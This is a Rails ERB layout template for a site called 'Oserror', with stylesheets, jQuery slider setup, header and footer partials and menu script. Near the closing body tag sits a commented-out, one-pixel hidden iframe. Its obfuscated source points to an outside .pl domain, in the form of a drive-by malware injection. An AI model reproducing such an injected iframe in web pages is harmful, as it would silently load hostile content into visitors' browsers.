<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Oserror</title>
<%= stylesheet_link_tag :all %>
<link href="css/style.css" rel="stylesheet" type="text/css" />
<link href="css/menu.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="js/menu.js"></script>
<%= javascript_include_tag"menu" %>
<!--[if gt IE 6]>
<link href="css/ie7-and-up.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--Sliding-->
<%= javascript_include_tag"jquery-1" %>
<%= javascript_include_tag"jquery" %>
<script type="text/javascript" src="js/jquery-1.js"></script>
<script type="text/javascript" src="js/jquery.js"></script>
<script type="text/javascript">
    $(function() {
        $("div#controller").jFlow({
            slides: "#slides",
            width: "381px",
            height: "313px"
        });
    });
    </script>
<!--Sliding-->
<%= javascript_include_tag"script" %>
<script type="text/javascript" src="js/script.js"></script>
</head>
<body>
<div id="wrapper">
<!--HEADER START-->
<%= render "shared/header" %>
<!--HEADER END-->
<div class="spacer"></div>

<%= yield %>
<div class="spacer"></div>
<%= render "shared/footer" %>

</div>
<script type="text/javascript">
    var menu=new menu.dd("menu");
    menu.init("menu","menuhover");
</script>
<!--<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>-->
</body>

</html>